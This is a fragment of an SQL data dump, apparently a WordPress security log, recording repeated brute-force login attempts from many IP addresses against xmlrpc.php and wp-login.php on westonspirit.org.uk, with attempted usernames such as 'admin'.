1','','13|0|0|0|westonspirit.org.uk/xmlrpc.php'),('190.172.103.169',3198969769,'',0,1629831530.5335,50,'b3VBjodZTF9wvQrkmG2Na7gS','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('190.172.103.169',3198969769,'',0,1629831590.9840,71,'7IHiGg8YQ6UfeCand1Fp0hM3','','13|0|0|0|westonspirit.org.uk/xmlrpc.php'),('190.172.103.169',3198969769,'',0,1629831591.3331,50,'yxp4T19DUbcSNB0Jg6RG7Yef','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('190.172.103.169',3198969769,'',0,1629831651.6787,71,'L6gMSBdWwPjYfh4258RFX0IE','','13|0|0|0|westonspirit.org.uk/xmlrpc.php'),('190.172.103.169',3198969769,'',0,1629831652.0762,50,'albJXoEFP6701GczkypAH82q','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('190.172.103.169',3198969769,'',0,1629831713.0441,71,'V6ZTjCf197Pvq3XEmzANiQtD','','13|0|0|0|westonspirit.org.uk/xmlrpc.php'),('190.172.103.169',3198969769,'',0,1629831713.4027,50,'yAOoGszgZRX70SjQuHPx6FEv','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('5.188.62.76',96222796,'westonspirit',0,1629831736.1762,51,'X94k2YelJyhLn7jdp3DICTvB','','0|0|0|0|www.westonspirit.org.uk/wp-login.php'),('186.64.114.80',3124785744,'admin',0,1629831755.8970,152,'XjaetFOLhbV0ops13YyRmSJN','','0|0|0|0|westonspirit.org.uk/xmlrpc.php'),('190.172.103.169',3198969769,'',0,1629831773.5869,71,'Dmh6ZoEYsBH4ucVUOdJLbx9S','','13|0|0|0|westonspirit.org.uk/xmlrpc.php'),('190.172.103.169',3198969769,'',0,1629831773.9355,50,'KtxdhvynUrgfFkcia0YHCXu6','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('190.172.103.169',3198969769,'',0,1629831834.8276,71,'KNCgli75EBcQ2z6LI1MnuWmy','','13|0|0|0|westonspirit.org.uk/xmlrpc.php'),('190.172.103.169',3198969769,'',0,1629831835.1511,50,'SqRvjgwYaoZMlrbuIhf1iQnk','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('190.172.103.169',3198969769,'',0,1629831895.6546,71,'1nNMxQRqZ2TI6HCoVOUczalF','','13|0|0|0|westonspirit.org.uk/xmlrpc.php'),('190.172.103.169',3198969769,'',0,1629831895.9955,50,'3Nkb82ceqwSWyJGsL6utFXME','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('190.172.103.169',3198969769,'',0,1629831957.3725,71,'rIbs0K8Xz6cLp3gEw4vAxZj7','','13|0|0|0|westonspirit.org.uk/xmlrpc.php'),('190.172.103.169',3198969769,'',0,1629831957.7328,50,'z97HIdZubfxiGh0LEsjnCerM','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('190.172.103.169',3198969769,'',0,1629832017.8100,71,'nPAj8gdqFWUb2aRpO0EImQZM','','13|0|0|0|westonspirit.org.uk/xmlrpc.php'),('190.172.103.169',3198969769,'',0,1629832018.1494,50,'lpEn70IxjtouGL8VUOaTryCq','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('104.248.18.239',1761088239,'admin',0,1629832049.7142,152,'IL1EfXS7lpYcQxykt9sR6jqZ','','0|0|0|0|westonspirit.org.uk/xmlrpc.php'),('190.172.103.169',3198969769,'',0,1629832078.8003,71,'b4s039UFgyTCPJtiAOZ2GV6u','','13|0|0|0|westonspirit.org.uk/xmlrpc.php'),('190.172.103.169',3198969769,'',0,1629832079.1608,50,'LP6pV2EOubQFhnaMsjtxieT7','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('190.172.103.169',3198969769,'',0,1629832140.0431,71,'G47bjNS3DrAU0qQm8ePYOcak','','13|0|0|0|westonspirit.org.uk/xmlrpc.php'),('190.172.103.169',3198969769,'',0,1629832140.3852,50,'EvPVMU3Dy05p1KRQrFlO4GN2','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('190.172.103.169',3198969769,'',0,1629832200.5730,71,'AZV0XgK65q1BQkYWHN7tedrP','','13|0|0|0|westonspirit.org.uk/xmlrpc.php'),('190.172.103.169',3198969769,'',0,1629832201.4031,50,'NOVCu5gcZyUwS6hqI8rodDKa','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('40.77.167.64',676177728,'',0,1629832233.8244,55,'jGqU0PB1xFl5LzZ7wJHmiuD6','','19|0|0|0|westonspirit.org.uk/lsj-published.php'),('190.172.103.169',3198969769,'',0,1629832261.8914,71,'JYP6pqmMDOQaGhTC0Fnv7ReX','','13|0|0|0|westonspirit.org.uk/xmlrpc.php'),('190.172.103.169',3198969769,'',0,1629832262.2223,50,'EGgqBu8krF4XMDR7Zfanwsp3','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('190.172.103.169',3198969769,'',0,1629832322.9318,71,'NRJXkqyW8Y6sxUIutdgGQfmB','','13|0|0|0|westonspirit.org.uk/xmlrpc.php'),('190.172.103.169',3198969769,'',0,1629832323.3357,50,'RtWzoMwr2kZ4eCOyGEm6IcpL','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('185.126.219.43',3112098603,'admin',0,1629832329.2484,152,'jrAdZJ6OveKCoGW9qsSkD357','','0|0|0|0|westonspirit.org.uk/xmlrpc.php'),('190.172.103.169',3198969769,'',0,1629832383.6756,71,'T8d5ujqPHyCDViJ0KXfSnGvw','','13|0|0|0|westonspirit.org.uk/xmlrpc.php'),('190.172.103.169',3198969769,'',0,1629832383.9996,50,'Ghb0OK85du4pk7wWCX1BefZJ','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('190.172.103.169',3198969769,'',0,1629832444.5438,71,'HKYv6AN1DygZPILcdCkmJoqO','','13|0|0|0|westonspirit.org.uk/xmlrpc.php'),('190.172.103.169',3198969769,'',0,1629832444.9155,50,'8H3LqbxSpja1XQg6mGcvu9KR','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('190.172.103.169',3198969769,'',0,1629832506.0815,71,'gMru7boa1cwvWhUYD0nO5Eks','','13|0|0|0|westonspirit.org.uk/xmlrpc.php'),('190.172.103.169',3198969769,'',0,1629832506.4763,50,'iHEkq5M8uoTnVUDISWc3gyzJ','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('190.172.103.169',3198969769,'',0,1629832566.5854,71,'UquNMS2XAlbRH9t87Yihs0rC','','13|0|0|0|westonspirit.org.uk/xmlrpc.php'),('190.172.103.169',3198969769,'',0,1629832566.9257,50,'z3WQSbaRvnsrUwgyDETLZj6B','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('72.167.42.45',1218914861,'admin',0,1629832601.4532,152,'ZW9zYg53XoS2jAf8heVOxu1s','','0|0|0|0|westonspirit.org.uk/xmlrpc.php'),('190.172.103.169',3198969769,'',0,1629832627.7163,71,'GcVjCRfBJulTqZWs2PSLvrgp','','13|0|0|0|westonspirit.org.uk/xmlrpc.php'),('190.172.103.169',3198969769,'',0,1629832628.0547,50,'Oj1Jys63HICgMPmdSe8qYVTv','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('190.172.103.169',3198969769,'',0,1629832688.8181,71,'4HiKpTwbo1EA58fDsI7BaVC6','','13|0|0|0|westonspirit.org.uk/xmlrpc.php'),('190.172.103.169',3198969769,'',0,1629832689.1831,50,'25nzXCbxSQdR3PYUcGegWqNw','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('41.232.112.178',703099058,'johnreaney',0,1629832712.8102,152,'ef8YF4JLZ9WhP3QkRsrVg2Ul','','0|0|0|0|www.westonspirit.org.uk/xmlrpc.php'),('190.172.103.169',3198969769,'',0,1629832749.7393,71,'Bs6gbQnvPYq84y02NCw1IADS','','13|0|0|0|westonspirit.org.uk/xmlrpc.php'),('190.172.103.169',3198969769,'',0,1629832750.1585,50,'ndDc39wgisHeQf4ya8FIjWRV','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('190.172.103.169',3198969769,'',0,1629832811.0531,71,'GC1jtfLuqQWToHaz625r8KBw','','13|0|0|0|westonspirit.org.uk/xmlrpc.php'),('190.172.103.169',3198969769,'',0,1629832811.3657,50,'BVpkjeKPA7FqsQhONycMzGum','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('190.172.103.169',3198969769,'',0,1629832871.5544,71,'XN0ZWdQ4o37srIVeSTi92nBD','','13|0|0|0|westonspirit.org.uk/xmlrpc.php'),('190.172.103.169',3198969769,'',0,1629832871.8994,50,'XoGwpC7AkZJEUrhu0bdNjOBT','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('188.166.247.170',3165058986,'admin',0,1629832880.5209,152,'n7ZFJES5mUcTBdkjYL3HyAal','','0|0|0|0|westonspirit.org.uk/xmlrpc.php'),('190.172.103.169',3198969769,'',0,1629832933.1566,71,'wEeazIFJXhMH1LiPQxy9VGoj','','13|0|0|0|westonspirit.org.uk/xmlrpc.php'),('190.172.103.169',3198969769,'',0,1629832933.4759,50,'VkYtOAfj7I8RM3iz5l6Zdbap','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('190.172.103.169',3198969769,'',0,1629832993.5756,71,'nuQZKzWU9Bkm5Elt2aSPwNqJ','','13|0|0|0|westonspirit.org.uk/xmlrpc.php'),('190.172.103.169',3198969769,'',0,1629832993.9501,50,'k3CoRMPiw9mGYDvaWBhsE50u','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('69.30.244.19',1159656467,'westonspirit',0,1629833025.1271,51,'DNkbPiMcVX5rQ8E4myJ7Uz1j','','0|0|0|0|westonspirit.org.uk/wp-login.php'),('190.172.103.169',3198969769,'',0,1629833054.7231,71,'zkB0NTWvwEmPfq6o1OVZJCKi','','13|0|0|0|westonspirit.org.uk/xmlrpc.php'),('190.172.103.169',3198969769,'',0,1629833055.5407,50,'NWIUzbM2f4qZP6VeySFwsGDg','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('190.172.103.169',3198969769,'',0,1629833116.1100,71,'I78xo2ucR1TdLh5GvUaQY6nC','','13|0|0|0|westonspirit.org.uk/xmlrpc.php'),('190.172.103.169',3198969769,'',0,1629833116.4444,50,'yq6AE7POMC5pe123BtXDUcdS','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('63.143.41.18',1066346770,'admin',0,1629833153.8444,152,'kujhLbQl7pztHfd920e5yKUA','','0|0|0|0|westonspirit.org.uk/xmlrpc.php'),('190.172.103.169',3198969769,'',0,1629833176.9072,71,'ndsNryKgfcUmlBR1e73kIziF','','13|0|0|0|westonspirit.org.uk/xmlrpc.php'),('190.172.103.169',3198969769,'',0,1629833177.7958,50,'lijRhKBTC2kfFD1wNWMp9zZ0','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('185.191.34.215',3116311255,'',0,1629833203.0123,55,'zGDTvBZNq1UL0349bXsCYE8c','','19|0|0|0|www.westonspirit.org.uk/wp-info.php'),('190.172.103.169',3198969769,'',0,1629833238.0520,71,'l8szZInOaQRGhAUyiESf39c4','','13|0|0|0|westonspirit.org.uk/xmlrpc.php'),('190.172.103.169',3198969769,'',0,1629833238.3847,50,'5Q6Gz4feZ1O9vgjHJuTbPUBn','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('190.172.103.169',3198969769,'',0,1629833298.6422,71,'lATVNab1nCxyQEI8ZkqiRmOh','','13|0|0|0|westonspirit.org.uk/xmlrpc.php'),('190.172.103.169',3198969769,'',0,1629833298.9833,50,'kXwhgZiQ1CxHufAGEDUSNWsO','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('190.172.103.169',3198969769,'',0,1629833360.0635,71,'Q5KXhIJTY23k9HaVvESycNMw','','13|0|0|0|westonspirit.org.uk/xmlrpc.php'),('190.172.103.169',3198969769,'',0,1629833360.3817,50,'tB3UhymfeZwG4N7Ycz9Cxr0I','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('190.172.103.169',3198969769,'',0,1629833420.6553,71,'TO39vd4r8RtzlGkbe0NjxBSw','','13|0|0|0|westonspirit.org.uk/xmlrpc.php'),('190.172.103.169',3198969769,'',0,1629833421.0249,50,'X5QGP3JirCgOoN4k71duVnD8','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('164.132.38.166',2760124070,'admin',0,1629833437.8187,152,'pDrqMYGeH7WyalQXV8S0UhOI','','0|0|0|0|westonspirit.org.uk/xmlrpc.php'),('190.172.103.169',3198969769,'',0,1629833482.0991,71,'zGOgvoMCBZ65IU4bhVuFxLy0','','13|0|0|0|westonspirit.org.uk/xmlrpc.php'),('190.172.103.169',3198969769,'',0,1629833482.4563,50,'6oBYtRpaMzZPUWjlAJ1fKNF8','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('190.172.103.169',3198969769,'',0,1629833542.5867,71,'JyicP1VeFDNRLu5AlK7BQGpt','','13|0|0|0|westonspirit.org.uk/xmlrpc.php'),('190.172.103.169',3198969769,'',0,1629833542.9374,50,'18Mf9JC2Ky4iwI3BYvjzatsQ','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('190.172.103.169',3198969769,'',0,1629833604.0058,71,'Y6o5u7IRdFtGay0eb8fxpCZ4','','13|0|0|0|westonspirit.org.uk/xmlrpc.php'),('190.172.103.169',3198969769,'',0,1629833604.3959,50,'zrcZJRqDW10M6Ae7poYQgvFw','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('190.172.103.169',3198969769,'',0,1629833664.5907,71,'f6F8nGl04iChbPgyTq5RdOHI','','13|0|0|0|westonspirit.org.uk/xmlrpc.php'),('190.172.103.169',3198969769,'',0,1629833664.6483,71,'PnF8c2CkHhDpb9sGxQtwEWUg','','13|0|0|0|westonspirit.org.uk/xmlrpc.php'),('190.172.103.169',3198969769,'',0,1629833664.9297,50,'lM7ExswcQejOzK0R16ayoFPN','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('190.172.103.169',3198969769,'',0,1629833665.0045,50,'6St49AcuhWHv51TNByx0LDbf','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('103.109.209.136',1735250312,'admin',0,1629833706.7975,152,'mvl2objVcf1RLINK9y8ZsMk4','','0|0|0|0|westonspirit.org.uk/xmlrpc.php'),('190.172.103.169',3198969769,'',0,1629833725.7806,71,'arANVmbSefQqJlZyFID254EU','','13|0|0|0|westonspirit.org.uk/xmlrpc.php'),('190.172.103.169',3198969769,'',0,1629833726.1174,50,'jVN1GBKLi7b3Ex8kFO9RXtSf','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('190.172.103.169',3198969769,'',0,1629833787.0742,71,'14CY2rup7EUlRB58zTq6HmOJ','','13|0|0|0|westonspirit.org.uk/xmlrpc.php'),('190.172.103.169',3198969769,'',0,1629833787.3904,50,'1l8GDqNJfwAKdbsp6XSxIjc0','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('190.172.103.169',3198969769,'',0,1629833847.6005,71,'cFkmg3w0KZu2CbyNoDj8rB7x','','13|0|0|0|westonspirit.org.uk/xmlrpc.php'),('190.172.103.169',3198969769,'',0,1629833848.0461,50,'tpHD1vwJAoj57uIq9ZT2xbGW','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('190.172.103.169',3198969769,'',0,1629833909.1299,71,'FLg8yZVlOKaShH5es6Jz1x0t','','13|0|0|0|westonspirit.org.uk/xmlrpc.php'),('190.172.103.169',3198969769,'',0,1629833909.5543,50,'9gChQjJ4TyYXR87KZIrexHbo','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('190.172.103.169',3198969769,'',0,1629833969.5991,71,'R3JUaCg5eNKpj9QDlrXIwbVO','','13|0|0|0|westonspirit.org.uk/xmlrpc.php'),('190.172.103.169',3198969769,'',0,1629833970.0076,50,'Omwvs7ZtEoP0rAUJahxeBGLf','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('107.152.42.142',1805134478,'admin',0,1629833991.3984,152,'Ca27G4Ke8cvrPpEngwJF93Io','','0|0|0|0|westonspirit.org.uk/xmlrpc.php'),('190.172.103.169',3198969769,'',0,1629834030.8246,71,'FkVpcXGhnOoCA9ae5TwME34z','','13|0|0|0|westonspirit.org.uk/xmlrpc.php'),('190.172.103.169',3198969769,'',0,1629834031.2394,50,'N9mEKpJMOhB86Ugx1HbySj0f','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('190.172.103.169',3198969769,'',0,1629834091.6903,71,'M17TV9BKmbRnDqQlfdAgujiZ','','13|0|0|0|westonspirit.org.uk/xmlrpc.php'),('190.172.103.169',3198969769,'',0,1629834092.0331,50,'1ZgtBcJfshwm7YAFWun3DHIG','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('190.172.103.169',3198969769,'',0,1629834152.9003,71,'EPwhea5D6KoFZ3Gl07n1QT9b','','13|0|0|0|westonspirit.org.uk/xmlrpc.php'),('190.172.103.169',3198969769,'',0,1629834153.2580,50,'1akZbVOf59cQMH2zj8UReYdJ','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('190.172.103.169',3198969769,'',0,1629834213.7197,71,'PbJQ9gTqtyofzOKVsxeCYr75','','13|0|0|0|westonspirit.org.uk/xmlrpc.php'),('190.172.103.169',3198969769,'',0,1629834214.0734,50,'oHFiGVwq3at7gKeB458ThbLY','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('103.90.232.106',1734010986,'admin',0,1629834259.8705,152,'NGRpqWrwo1txEBclJjUmkFf0','','0|0|0|0|westonspirit.org.uk/xmlrpc.php'),('190.172.103.169',3198969769,'',0,1629834274.8366,71,'mx6QI3UkbXsaBn278oTZSEeJ','','13|0|0|0|westonspirit.org.uk/xmlrpc.php'),('190.172.103.169',3198969769,'',0,1629834275.1562,50,'Xz9dtJqMLm06jIKve4fxDonr','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('190.172.103.169',3198969769,'',0,1629834335.7042,71,'DkxvpUInOVBq06ELhui1zGo4','','13|0|0|0|westonspirit.org.uk/xmlrpc.php'),('190.172.103.169',3198969769,'',0,1629834336.1053,50,'CRLs7bflV3GBAqmp6FuJSXZO','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('190.172.103.169',3198969769,'',0,1629834397.1617,71,'cZRvE2IldMsHfFYNeXa6JCrg','','13|0|0|0|westonspirit.org.uk/xmlrpc.php'),('190.172.103.169',3198969769,'',0,1629834397.5348,50,'Ouw1QP6NtkAVohpU2i8Brcba','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('190.172.103.169',3198969769,'',0,1629834457.9075,71,'q8rRFm4lKn3HoEk2S60VgaGQ','','13|0|0|0|westonspirit.org.uk/xmlrpc.php'),('190.172.103.169',3198969769,'',0,1629834458.2393,50,'o6sbnaruOQHfK9MS5i7RyGpq','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('186.64.118.190',3124786878,'admin',0,1629834514.2949,152,'qTIc8u3dA5VjPlHsQeF4hGp1','','0|0|0|0|westonspirit.org.uk/xmlrpc.php'),('190.172.103.169',3198969769,'',0,1629834518.8125,71,'NV5svMIjfF3ukHwpqXle26rh','','13|0|0|0|westonspirit.org.uk/xmlrpc.php'),('190.172.103.169',3198969769,'',0,1629834519.1682,50,'nyDo9zs31Oxa5tVZ7kuRvrqN','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('190.172.103.169',3198969769,'',0,1629834579.6315,71,'noy9rGQgeMqLFJzj7HDih1RA','','13|0|0|0|westonspirit.org.uk/xmlrpc.php'),('190.172.103.169',3198969769,'',0,1629834580.0160,50,'ePbySnrudRom6viUz8QsMKWJ','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('190.172.103.169',3198969769,'',0,1629834640.8448,71,'4dI8A7wqiKy1b9Yj5aNPlMS6','','13|0|0|0|westonspirit.org.uk/xmlrpc.php'),('190.172.103.169',3198969769,'',0,1629834641.1871,50,'jTyOfoQUJ4nKERCgta5Mdw90','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('190.172.103.169',3198969769,'',0,1629834702.1376,71,'b79iC5seOTdKSI1UqXz6m02v','','13|0|0|0|westonspirit.org.uk/xmlrpc.php'),('190.172.103.169',3198969769,'',0,1629834702.5241,50,'kt5hfE7MCJPRm0jXIi2ZVzAn','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('190.172.103.169',3198969769,'',0,1629834762.8678,71,'dpFYQBzcergm5SV49PGhE03u','','13|0|0|0|westonspirit.org.uk/xmlrpc.php'),('190.172.103.169',3198969769,'',0,1629834763.2596,50,'YmKxNEIWrQ89qn2h5Lazksf4','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('186.64.115.80',3124786000,'admin',0,1629834799.5841,152,'1zNUMi2RwGEl7YZJvIPbTVqj','','0|0|0|0|westonspirit.org.uk/xmlrpc.php'),('190.172.103.169',3198969769,'',0,1629834824.4048,71,'y1u3orS4UiZnlKx5fzeAjMHW','','13|0|0|0|westonspirit.org.uk/xmlrpc.php'),('190.172.103.169',3198969769,'',0,1629834824.7803,50,'QfJE3HLkGCb6YF4s8XzZ10Rh','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('190.172.103.169',3198969769,'',0,1629834884.6711,71,'IvWikrVwdnqYxN2pPzuDb7tF','','13|0|0|0|westonspirit.org.uk/xmlrpc.php'),('190.172.103.169',3198969769,'',0,1629834885.0652,50,'8j3Ca9sLXchSz2H1ubdDEMfP','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('190.172.103.169',3198969769,'',0,1629834946.0975,71,'vEpfujPc6ixFoI21sAOTGJ8M','','13|0|0|0|westonspirit.org.uk/xmlrpc.php'),('190.172.103.169',3198969769,'',0,1629834946.4374,50,'fkl73MSgdvE5h08HyNY4nJc1','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('190.172.103.169',3198969769,'',0,1629835006.7554,71,'AT2N4o7suzLC9Ufwrgb0V5PI','','13|0|0|0|westonspirit.org.uk/xmlrpc.php'),('190.172.103.169',3198969769,'',0,1629835007.1120,50,'GRvsNnUTzArxB2dE5LogYQaI','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('190.172.103.169',3198969769,'',0,1629835068.1364,71,'OyZ85B3IberU46VYXcpogaLS','','13|0|0|0|westonspirit.org.uk/xmlrpc.php'),('190.172.103.169',3198969769,'',0,1629835068.4999,50,'PrYG75hgCTUE2lzqtxQwMcZI','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('103.120.176.86',1735962710,'admin',0,1629835125.0119,152,'p5Y3JBKwIcWiU2P6AtEjb1eV','','0|0|0|0|westonspirit.org.uk/xmlrpc.php'),('207.45.183.66',3475879746,'admin',0,1629835410.3529,152,'4aKiqRnsjtEUwDJX31vGTL6V','','0|0|0|0|westonspirit.org.uk/xmlrpc.php'),('107.180.105.195',1806985667,'admin',0,1629835704.5610,152,'wCtBmyAc9NfYiTIsLMPUnDZJ','','0|0|0|0|westonspirit.org.uk/xmlrpc.php'),('198.204.225.194',3335315906,'admin',0,1629835847.3687,7,'3jkmPSLR1uCbZvQ0dxAVX7Hr','','0|0|0|0|westonspirit.org.uk/wp-login.php'),('104.37.175.156',1747300252,'admin',0,1629836009.8121,152,'MNVy4aiD3QAZg7TIkKnXp0HL','','0|0|0|0|westonspirit.org.uk/xmlrpc.php'),('186.64.119.145',3124787089,'admin',0,1629836283.3965,152,'TzJyIWD8uiKnB91xqpvs2UZN','','0|0|0|0|westonspirit.org.uk/xmlrpc.php'),('103.142.25.112',1737365872,'admin',0,1629836595.5320,152,'1FPR6iqCjofNgZGzuD0YyL9X','','0|0|0|0|westonspirit.org.uk/xmlrpc.php'),('190.172.103.169',3198969769,'',0,1629836752.6487,71,'G9fuPS0dFHx6aZ8KpCvVtnwL','','13|0|0|0|westonspirit.org.uk/xmlrpc.php'),('190.172.103.169',3198969769,'',0,1629836753.7882,50,'RYTtZFovb9Bf3sph0JrPHAIg','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('190.172.103.169',3198969769,'',0,1629836826.8847,71,'EJ7rSzIeFiUjTYHPpx9BmwnC','','13|0|0|0|westonspirit.org.uk/xmlrpc.php'),('190.172.103.169',3198969769,'',0,1629836827.3797,50,'mBsY2rgf9izylqebkTVCDRxZ','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('190.172.103.169',3198969769,'',0,1629836895.1626,71,'5qU9SsRKy6hA4jmJ3IMFg0ua','','13|0|0|0|westonspirit.org.uk/xmlrpc.php'),('190.172.103.169',3198969769,'',0,1629836896.2425,50,'qrCEF2dyMzKP56DB1uwmTftH','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('142.93.218.96',2388515424,'admin',0,1629836901.4677,152,'ciX0kPOgLTGC9FNDf238VxSh','','0|0|0|0|westonspirit.org.uk/xmlrpc.php'),('190.172.103.169',3198969769,'',0,1629836955.0309,71,'dTxyg0KqanCwWXfPVNlZtABp','','13|0|0|0|westonspirit.org.uk/xmlrpc.php'),('190.172.103.169',3198969769,'',0,1629836955.5041,50,'Y4fakw5OQchJ06XVuCLWd9UB','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('190.172.103.169',3198969769,'',0,1629837016.3643,71,'IGwkfoZrYdtuFBNJqQMAOChR','','13|0|0|0|westonspirit.org.uk/xmlrpc.php'),('190.172.103.169',3198969769,'',0,1629837017.6778,50,'3OZR8HYWPhBm629UXTqlAwLx','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('190.172.103.169',3198969769,'',0,1629837077.1307,71,'n42Ncs6DXEk9OoxQ5qilzyGZ','','13|0|0|0|westonspirit.org.uk/xmlrpc.php'),('190.172.103.169',3198969769,'',0,1629837077.5562,50,'7p4aQS3fUisHEXT9jrKguNFc','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('190.172.103.169',3198969769,'',0,1629837138.2480,71,'czoInTuV7MgtBUw8Gva0QOXP','','13|0|0|0|westonspirit.org.uk/xmlrpc.php'),('190.172.103.169',3198969769,'',0,1629837138.6259,50,'EVplM8HJGevWSuOztLT2cqdb','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('190.172.103.169',3198969769,'',0,1629837199.0220,71,'cPzNm9GXRs5ZCDYTIJSEkbpF','','13|0|0|0|westonspirit.org.uk/xmlrpc.php'),('190.172.103.169',3198969769,'',0,1629837199.4018,50,'3unFfgtXPRvSNlMCObcyhKzj','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('190.172.103.169',3198969769,'',0,1629837260.3500,71,'oUgQE5dSBlkO2RTAK7Lrex4V','','13|0|0|0|westonspirit.org.uk/xmlrpc.php'),('190.172.103.169',3198969769,'',0,1629837260.6989,50,'V367ET19laOYuZmp5kBtLNAq','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('190.172.103.169',3198969769,'',0,1629837321.1271,71,'5IbyfxVZLeriNtzmoGShX7Fa','','13|0|0|0|westonspirit.org.uk/xmlrpc.php'),('190.172.103.169',3198969769,'',0,1629837321.5207,50,'czD4IUqvlnfiQOJjdktBHCMG','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('190.172.103.169',3198969769,'',0,1629837382.5316,71,'Fvxg2bLpADsP5ckCKwV0IOTU','','13|0|0|0|westonspirit.org.uk/xmlrpc.php'),('190.172.103.169',3198969769,'',0,1629837382.9590,50,'O2la8eHm9kPwKoyW64CbBgGu','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('190.172.103.169',3198969769,'',0,1629837442.9926,71,'inWhZfR7wY0BOUN83K6vIeSs','','13|0|0|0|westonspirit.org.uk/xmlrpc.php'),('190.172.103.169',3198969769,'',0,1629837443.3604,50,'KrUcgwYJHeVo78SCQqMPsfiG','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('190.172.103.169',3198969769,'',0,1629837504.4194,71,'19ZG5jLV6pPUbQgnyAiqNmd2','','13|0|0|0|westonspirit.org.uk/xmlrpc.php'),('190.172.103.169',3198969769,'',0,1629837504.9701,50,'BSWYKR3y5PZech9zXECoq7Up','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('13.76.132.231',223118567,'admin',0,1629837517.8401,152,'0xJtAnef7VarIhpQ5XTvGbBs','','0|0|0|0|westonspirit.org.uk/xmlrpc.php'),('190.172.103.169',3198969769,'',0,1629837564.9733,71,'sBEuAIUgQpSebJn42TYMxmGa','','13|0|0|0|westonspirit.org.uk/xmlrpc.php'),('190.172.103.169',3198969769,'',0,1629837565.3641,50,'2fvZl1Rm9F7MjcOTHnKUxtIX','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('190.172.103.169',3198969769,'',0,1629837626.2435,71,'EOMsmwIv1zeqFHdGxAbKJaQi','','13|0|0|0|westonspirit.org.uk/xmlrpc.php'),('190.172.103.169',3198969769,'',0,1629837626.5987,50,'EJVoy1Yt4Hen0AXugkTBPD7l','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('66.29.143.127',1109233535,'admin',0,1629837827.4277,152,'jWku41dRPHaZ0Qcfhgqzpt7v','','0|0|0|0|westonspirit.org.uk/xmlrpc.php'),('177.10.165.117',2970264949,'admin',0,1629838128.0668,152,'ynHhKDQSL83sFwWaNgb26jIY','','0|0|0|0|westonspirit.org.uk/xmlrpc.php'),('208.110.85.68',3496891716,'westonspirit',0,1629838321.2724,51,'ACtkbsolzQK2SpcjNTY8JB9P','','0|0|0|0|westonspirit.org.uk/wp-login.php'),('50.116.98.31',846488095,'admin',0,1629838411.6626,152,'ibJz6agVFHMAEeyYL4N3C9Gq','','0|0|0|0|westonspirit.org.uk/xmlrpc.php'),('47.254.216.219',805230811,'admin',0,1629838760.8281,152,'KeRG0Ewj1p4DyuJINFvZsoXU','','0|0|0|0|westonspirit.org.uk/xmlrpc.php'),('148.217.50.46',2497262126,'admin',0,1629839051.6744,152,'4w2MfXSJdYV8gRHCynFAoUP7','','0|0|0|0|westonspirit.org.uk/xmlrpc.php'),('35.202.236.112',600501360,'admin',0,1629839391.9364,152,'Rq4JShaGAgml